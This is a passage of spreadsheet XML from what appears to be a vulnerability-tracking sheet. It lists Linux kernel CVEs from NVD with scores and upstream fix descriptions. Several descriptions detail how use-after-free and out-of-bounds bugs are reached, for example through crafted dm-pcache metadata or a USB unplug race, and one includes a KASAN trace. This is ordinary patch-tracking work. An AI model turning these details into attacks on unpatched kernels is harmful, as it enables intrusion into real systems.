      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr"/>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix info leak and UAF in device unregister path
i3c_master_unregister_i3c_devs() clears i3cdev-&gt;dev-&gt;desc before
calling device_unregister().  During device_unregister(),
device_del() emits a KOBJ_REMOVE uevent and unbinds the driver while
the device descriptor is still expected to be valid.  As a result,
i3c_device_uevent() and a racing modalias_show() can observe a NULL
desc and fall back to an uninitialized stack struct i3c_device_info,
leaking kernel stack contents in the generated modalias.  Driver
.remove() callbacks may also encounter an unexpected NULL desc during
unbind.
Keep desc valid until device_unregister() has completed.  Since
device_unregister() drops the device reference and may free the device,
take an extra reference with get_device() before unregistering.  Clear
desc afterwards and release the extra reference with put_device().
This preserves the release-time invariant that desc must be NULL while
avoiding both the information leak and a potential use-after-free from
writing desc after the device has been released.</t>
        </is>
      </c>
      <c r="S318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80952</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80954</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr"/>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr"/>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: Fix unlocked dereference of dev-&gt;desc in i3c_device_get_supported_xfer_mode()
i3c_device_get_supported_xfer_mode() uses dev-&gt;desc to obtain the
master controller.  However, dev-&gt;desc must not be dereferenced unless
bus-&gt;lock is held, and this function does not take that lock.
The function only needs access to the master controller associated with
the device's bus.  Use dev-&gt;bus instead, which is always valid for the
lifetime of the device and does not require dereferencing dev-&gt;desc.</t>
        </is>
      </c>
      <c r="S319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80954</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80955</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr"/>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: fix use-after-free and invalid seg operations in kset_replay()
In kset_replay, when key-&gt;seg_gen is stale (key-&gt;seg_gen &lt;
key-&gt;cache_pos.cache_seg-&gt;gen), cache_key_put(key) is called but then
key-&gt;cache_pos.cache_seg is accessed as the argument to cache_seg_get().
This is a use-after-free on the freed key memory. Although mempool
recycled memory is not immediately reclaimed or overwritten in practice,
this is still a potential UAF bug.
Additionally, for expired invalid keys, setting the cache-&gt;seg_map bit
and calling cache_seg_get() is unreasonable since the corresponding
segment data is no longer valid.
Fix both issues by moving cache_seg_get() and __set_bit() after the
gen check, so they only execute for valid keys, and using continue to
skip invalid keys.</t>
        </is>
      </c>
      <c r="S320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80955</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80959</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr"/>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr"/>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: bound the persisted tail-position offset
cache_pos_decode() takes the persisted key_tail and dirty_tail seg_off from
the cache device and addresses within the segment with it. A seg_off at or
past the segment data_size, controllable by whoever supplies the device
(CAP_SYS_ADMIN), reads past the segment data.
Reject a decoded seg_off that is not below the segment data_size.</t>
        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80959</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80961</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate kset key_num and intra-segment bounds
Two more fields decoded from the cache device go unbounded. The kset
key_num drives cache_kset_crc() and the replay loop in cache_replay(),
the writeback worker and the GC worker, but only the magic and a
fixed-seed CRC are checked first, so a non-last kset whose key_num exceeds
the PCACHE_KSET_KEYS_MAX buffer reads past its end before the CRC compare.
A key's intra-segment offset and length in cache_key_decode() are taken
verbatim, so a key running past its segment is replayed into the cache
tree and the data CRC check and every later read hit then copy adjacent
persistent memory into the caller's bio -- an out-of-bounds read that
leaks to user space. Both fields are controlled by whoever supplies the
cache device (CAP_SYS_ADMIN); the CRC seed is public.
Add kset_onmedia_valid() to bound key_num before any kset read, and
reject a key whose offset plus length, computed in 64 bits, exceeds the
segment data_size. Valid metadata is unaffected.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80961</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80962</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-pcache: validate geometry fields from on-disk cache_info
cache_segs_init() iterates cache_info-&gt;n_segs times indexing
cache-&gt;segments[], which is sized to the cache device geometry, and
get_seg_id() takes each segment id from the on-media cache_info and the
per-segment next_seg link. Both come from cache device metadata that is
only CRC-protected with a fixed public seed, so whoever supplies the
cache device on a table load (CAP_SYS_ADMIN) controls them: an oversized
n_segs or an out-of-range id drives an out-of-bounds access of
cache-&gt;segments[] and a wild CACHE_DEV_SEGMENT() pointer into the device
mapping -- an out-of-bounds read and write from on-disk data.
Reject an n_segs that exceeds the device segment count and a segment id
that is out of range before either is used. Valid metadata is unaffected.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80962</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80971</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: bcd2000: clear the URB pointers on disconnect
bcd2000_free_usb_related_resources() frees both URBs and leaves the
pointers behind:
	usb_kill_urb(bcd2k-&gt;midi_out_urb);
	usb_kill_urb(bcd2k-&gt;midi_in_urb);
	usb_free_urb(bcd2k-&gt;midi_out_urb);
	usb_free_urb(bcd2k-&gt;midi_in_urb);
The rawmidi device outlives that call.  A substream that is still open
when the device is unplugged reaches bcd2000_midi_send() from the
trigger path on close.  That function writes to the freed URB and then
hands it to the USB core:
	bcd2k-&gt;midi_out_urb-&gt;transfer_buffer_length = BUFSIZE;
	...
	ret = usb_submit_urb(bcd2k-&gt;midi_out_urb, GFP_ATOMIC);
usb_kill_urb() does not stop a later submission either, so a submit that
races the disconnect can requeue the URB after it has been reaped.
midi_in_urb is exposed the same way: bcd2000_input_complete() resubmits
it from the completion handler.
KASAN on 7.2.0-rc5 (arm64):
  BUG: KASAN: slab-use-after-free in bcd2000_midi_send [snd_bcd2000]
  Write of size 4 at addr ffff00001827d388 by task bpoc/168
   __asan_store4
   bcd2000_midi_send [snd_bcd2000]
   bcd2000_midi_output_trigger [snd_bcd2000]
   snd_rawmidi_kernel_write1
   close_substream.part.0
  Freed by task 168:
   usb_free_urb
   bcd2000_disconnect [snd_bcd2000]
  BUG: KASAN: slab-use-after-free in usb_submit_urb
  Read of size 8 at addr ffff00001827d3b8 by task bpoc/168
Clear both pointers after freeing and test them on the paths that can
still run.  Poison the URBs before freeing them: usb_poison_urb() waits
for a running completion handler and rejects any later submission, so
after it returns the input path is quiesced and only the rawmidi trigger
path can still reach bcd2000_midi_send().  No unpoison is needed; the
URBs are freed on the next line.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80971</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80975</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mfd: qnap-mcu: keep the reply buffer alive past a command timeout
qnap_mcu_exec() publishes an on-stack buffer to the receive path:
	unsigned char rx[QNAP_MCU_RX_BUFFER_SIZE];
	...
	reply-&gt;data = rx;
	reply-&gt;length = length;
and qnap_mcu_receive_buf() writes into it from the serdev receive path,
which runs out of flush_to_ldisc() and is not serialized against
qnap_mcu_exec() at all. bus_lock cannot cover it, because qnap_mcu_exec()
holds that mutex across wait_for_completion_timeout().
On a timeout qnap_mcu_exec() returns with reply-&gt;data still pointing at
its own frame. A reply that arrives late, or an unsolicited message from
the MCU, is then written into a stack frame that has been left, corrupting
whatever runs next on that stack. The same applies when qnap_mcu_write()
fails, since that path returns without touching the reply state either.
Move the receive buffer into struct qnap_mcu. It is 37 bytes and the
structure is devm_kzalloc()ed, so it lives as long as the driver, and a
late write lands in memory that is still valid and is reinitialized by the
next command. bus_lock keeps commands from sharing it.
This deliberately does not clear reply-&gt;data or reply-&gt;length on the
timeout path. Doing so races with qnap_mcu_receive_buf(), which reads both
after its
	if (!reply-&gt;length)
		return size;
check: clearing reply-&gt;data gives a NULL dereference, and clearing
reply-&gt;length alone removes the reply-&gt;received == reply-&gt;length exit
condition, so the copy loop runs until the uart chunk is consumed and
overruns the buffer. Leaving both set keeps the write bounded by
reply-&gt;length, which qnap_mcu_exec() has already checked against
sizeof(mcu-&gt;rx).</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80975</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80977</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: skbuff: don't touch shared zerocopy state in skb_tx_error()
skb_tx_error() completes the zerocopy uarg and clears
SKBFL_ALL_ZEROCOPY, and skb_zcopy_downgrade_managed() clears
SKBFL_MANAGED_FRAG_REFS. Both live in skb_shinfo(), which every clone
shares, while the caller only owns the reference it is about to drop.
Through a clone it tells the producer its pages are free and drops
SKBFL_SHARED_FRAG for an skb that is still in flight.
Open vSwitch reaches this with a non-last OVS_ACTION_ATTR_RECIRC:
clone_execute() sends a skb_clone() into ovs_dp_process_packet() while
do_execute_actions() keeps forwarding the original, and skb_clone()
does not privatise the frags here -- skb_orphan_frags() returns early
on SKBFL_DONT_ORPHAN. A flow miss on the clone then strips the marker
from the packet still being forwarded, and a later local ESP delivery
decrypts in place over frags it does not own privately.
Skip it for a cloned skb. Nothing is lost: skb_release_data() clears
the zerocopy state once the last reference to the shared data goes.</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80977</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80978</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: cap advertised IP tunnel headroom
IP tunnel devices derive their advertised needed_headroom from lower
output devices. A stack of user-created devices can make the derived
value larger than the 16-bit skb header offsets can represent. Once IP
output reserves it, skb head expansion can wrap those offsets.
The runtime transmit path already caps a growing needed_headroom at 512.
Apply the same cap when tunnel configuration publishes needed_headroom
derived from a lower output device.
Capping the advertised value is safe: IP tunnel transmit still expands
the skb when a packet needs more headroom. A nonsensical stacked
configuration can therefore incur an extra reallocation, but it cannot
publish an unbounded reservation to upper layers.</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80978</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80979</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: unregister the connection before draining the rx tasklet
smc_conn_free() calls smc_ism_unset_conn() only while the link group is
still on its device list, and never sets conn-&gt;killed.
smc_lgr_terminate_sched() unlinks the group immediately and defers killing
its connections to a work item, so a connection freed in that window keeps
its smcd-&gt;conn[] slot with both gates in smcd_handle_irq() open, and the
device can re-arm the receive tasklet after tasklet_kill() has returned. On
the DMB-nocopy path the ghost send buffer is freed right after that drain,
so the re-armed tasklet dereferences it.
Unregister unconditionally and drain before the detach at both teardown
sites, mirroring rmb_desc, which smc_buf_unuse() releases after the drain.
Clear conn-&gt;sndbuf_desc before freeing it as well, so a reader that samples
the pointer cannot get one that is already freed.</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80979</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80982</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr"/>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr"/>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix use-after-free in smc_rx_pipe_buf_release()
smc_rx_splice() hands RMB pages to a pipe and takes a socket reference
per entry so the smc_sock stays alive until the reader finishes. The
connection does not: a concurrent close runs smc_conn_free(), which
releases the receive buffer back to the link group pool.
smc_rx_pipe_buf_release() tests sk_state before taking the socket lock.
The state can change between the test and the lock, and
smc_rx_update_cons() then dereferences conn-&gt;rmb_desc and walks
conn-&gt;lgr, which smc_conn_free() has already released. On the
is_reg_err path smcr_buf_unuse() frees the descriptor outright, so
this is a use-after-free.
Take the socket lock first and test conn-&gt;freed instead.
smc_conn_free() sets that flag before releasing anything, and every
caller holds the socket lock. The two paths exclude each other: either
the pipe release runs first with everything valid, or it sees the flag
and skips the update.</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80982</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80991</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr"/>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr"/>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ravb: serialize PTP clock teardown
ravb_ptp_interrupt() can race with ravb_ptp_stop() and pass the clock to
ptp_clock_event() while ptp_clock_unregister() is freeing it. This can
lead to a use-after-free.
Use READ_ONCE() and WRITE_ONCE() for lockless access to the clock pointer.
Atomically detach it with xchg() before disabling PTP interrupts, then
synchronize all IRQs which can invoke ravb_ptp_interrupt() before
unregistering the detached clock.
A handler which read the old pointer completes before the clock is
unregistered, while later handlers read NULL and skip the event.</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80991</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80992</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
